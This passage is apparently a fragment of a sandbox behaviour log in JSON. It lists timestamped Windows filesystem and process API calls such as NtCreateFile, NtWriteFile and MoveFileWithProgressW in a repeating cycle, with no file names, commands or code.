"2016-02-16 17:41:56,523", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,533", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,543", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,543", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:56,543", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,553", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,563", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,563", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,563", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,573", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,573", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,573", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,573", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,573", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:56,584", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,584", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,594", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,594", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,604", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,614", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,624", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,634", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtSetInformationFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:56,634", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,634", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,644", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,654", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:56,654", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,654", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,664", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,674", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,674", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,684", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,684", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,684", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,694", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,694", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,704", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,714", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,724", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,734", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,734", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,744", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,754", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:56,764", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,764", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,764", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,774", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:56,774", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,784", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,794", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:56,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,804", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,814", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,814", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,824", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,834", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtSetInformationFile"}, {"category": "process", 